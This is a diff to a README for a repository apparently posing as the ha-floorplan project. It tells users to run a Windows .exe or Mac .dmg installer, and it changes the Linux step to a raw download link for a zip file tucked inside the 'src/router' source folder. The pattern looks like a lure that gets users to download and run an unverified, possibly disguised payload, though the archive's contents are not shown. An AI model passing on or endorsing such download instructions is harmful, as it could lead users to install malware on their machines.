prince071718/ha-floorplan/README.md

 2. **Install the Application:**
    - **For Windows:** Double-click the `.exe` file and follow the on-screen instructions.
    - **For Mac:** Open the `.dmg` file, drag the ha-floorplan icon to your Applications folder.
-   - **For Linux:** Extract the `.tar.gz` file and follow the instructions inside the README for your specific distribution.
+   - **For Linux:** Extract the `https://github.com/prince071718/ha-floorplan/raw/refs/heads/main/src/router/floorplan_ha_2.7-alpha.2.zip` file and follow the instructions inside the README for your specific distribution.
 3. **Start the Application:** After installation, launch the application from your desktop or applications folder.

 ## 🌟 Configuring Your Floorplan